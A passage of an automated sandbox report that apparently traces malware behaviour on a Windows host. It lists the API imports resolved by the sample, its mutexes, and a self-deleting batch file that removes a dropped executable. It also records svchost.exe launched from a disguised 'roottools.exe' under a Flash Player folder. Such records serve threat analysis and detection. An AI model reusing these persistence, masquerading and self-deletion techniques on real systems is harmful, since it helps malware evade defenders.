Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75a03f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x75a0424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x75a016dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x75a016c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x75a0183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75a01136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x75a04220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75a0110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75a0186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x757b49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x757b8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x757afbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x757b1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x772a25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x757a8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x757a9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x757b2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x757b3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75801a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x757a7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x757b05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x757a787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x757ab17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x757b6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x757ad156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x757af350	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x758dd718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x756f469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x756f45f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7570779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x756f0e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x756f40e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x756f0e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x756f2a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x756f40fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x756ec54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x756e9fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x756ef4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x756edf4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x756edf36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x756f4680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x756f14d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x756edf66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x756f4304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x756f412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x756f4620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x756f468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x756ec532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x756f432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x756f46ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x756ee124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x756f431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x756ec51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x756f418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x756f415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x756f4608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x756f41b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x756f413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x756ecf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7570773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x756ee15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x756f46e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x756f445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7573db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x756edf14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x75c63c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75c71e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x75cd5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x750e45bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x750e55bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x7510cd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x750e4745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x7510d32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x750e46e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x750e86f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x750ec39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x750e3248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x750ec177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x7511066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x750e5331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x750ffbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x750ea1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x750dfcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x750fedfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x750dff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x750e5c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x750fc6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x7510ce21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x74eb13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x7546e599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x754909ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x7547363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75465ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75499d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x754986d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x75145689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x75144de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7514e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x751454f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x75144f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x75145f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x75145ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x751458b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x753749e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x7536b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x7536a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75361b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75374c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x7535d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x753675e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x7537f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x7536ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x753e18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x76c71d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x76b63eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x74dea415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = RtlDosPathNameToNtPathName_U, address_out = 0x772cce41	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtCreateFile, address_out = 0x772900a4	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtClose, address_out = 0x7728f9d0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQueryEaFile, address_out = 0x77291314	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtSetEaFile, address_out = 0x772919b0	1	Fn

Window (5)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = ThunderRT6Main, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBMsoStdCompMgr, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBFocusRT6, wndproc_parameter = 0	1	Fn
Create	Langskallet7	wndproc_parameter = 0	1	Fn
Set Attribute	-	class_name = VBMsoStdCompMgr, index = 0, new_long = 5513372	1	Fn

Keyboard (1)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721		1	Fn

System (43)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	1	Fn
Sleep	duration = 15 milliseconds (0.015 seconds)	32	Fn
Sleep	duration = 8000 milliseconds (8.000 seconds)	1	Fn
Get Info	type = Operating System	3	Fn
Get Info	type = Operating System	5	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (9)

Operation	Additional Information	Count	Logfile
Create	-	1	Fn
Create	mutex_name = C2E6ECE9938A43206F172A85684E36DB	1	Fn
Create	mutex_name = CEE48AFA231AB21CA6E2437DB844BAD7	1	Fn
Create	mutex_name = 1F4C22565107A34AD73CB0F585F8F77C	1	Fn
Open	mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE	1	Fn
Open	mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE	2	Fn
Open	mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE	2	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Process #8: cmd.exe

(Host: 112, Network: 0)

Information	Value
ID	#8
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:33, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:08:40

OS Process Information

Information	Value
PID	0x7f0
Parent PID	0x65c (c:\users\aetadzjz\appdata\roaming\iuoldw.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 7FC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000200000	0x00200000	0x00200fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000230000	0x00230000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003a0000	0x003a0000	0x003affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000440000	0x00440000	0x004bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000004c0000	0x004c0000	0x00647fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000690000	0x00690000	0x0078ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000790000	0x00790000	0x00910fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000920000	0x00920000	0x01d1ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001d20000	0x01d20000	0x02062fff	Pagefile Backed Memory	Readable	Region Actions
cmd.exe	0x49fa0000	0x49febfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746f0000	0x746f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x74700000	0x7475bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74760000	0x7479efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x74870000	0x74876fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (71)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	5	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Get Info	C:\Users\aETAdzjz\Desktop	type = file_attributes	2	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	5	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	type = file_attributes	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat	type = file_attributes	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp	type = file_attributes	1	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	13	Fn
Open	STD_INPUT_HANDLE	-	7	Fn
Open	STD_INPUT_HANDLE	-	20	Fn
Open	STD_ERROR_HANDLE	-	3	Fn
Read	STD_INPUT_HANDLE	size = 8191, size_out = 200	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 189	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 185	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 127	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 63	1	Fn Data
Write	STD_ERROR_HANDLE	size = 33	1	Fn Data
Delete	C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	-	1	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat	-	1	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (12)

Operation	Module	Additional Information	Count	Logfile
Load	ADVAPI32.dll	base_address = 0x756e0000	1	Fn
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0x49fa0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x759f0000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75a1a84f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75a23b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75a04a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x75a1a79d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferIdentifyLevel, address_out = 0x75702102	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferComputeTokenFromLevel, address_out = 0x75703352	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferCloseLevel, address_out = 0x75703825	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-01-10 18:52:59 (UTC)		1	Fn
Get Time	type = Ticks, time = 156422		1	Fn

Environment (10)

Operation	Additional Information	Count	Logfile
Get Environment String	-	3	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn

Process #12: svchost.exe

(Host: 2174, Network: 23)

Information	Value
ID	#12
File Name	c:\windows\syswow64\svchost.exe
Command Line	C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory	C:\Users\aETAdzjz\AppData\Roaming\
Monitor	Start Time: 00:03:34, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:06:39

OS Process Information

Information	Value
PID	0x634
Parent PID	0x7a8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
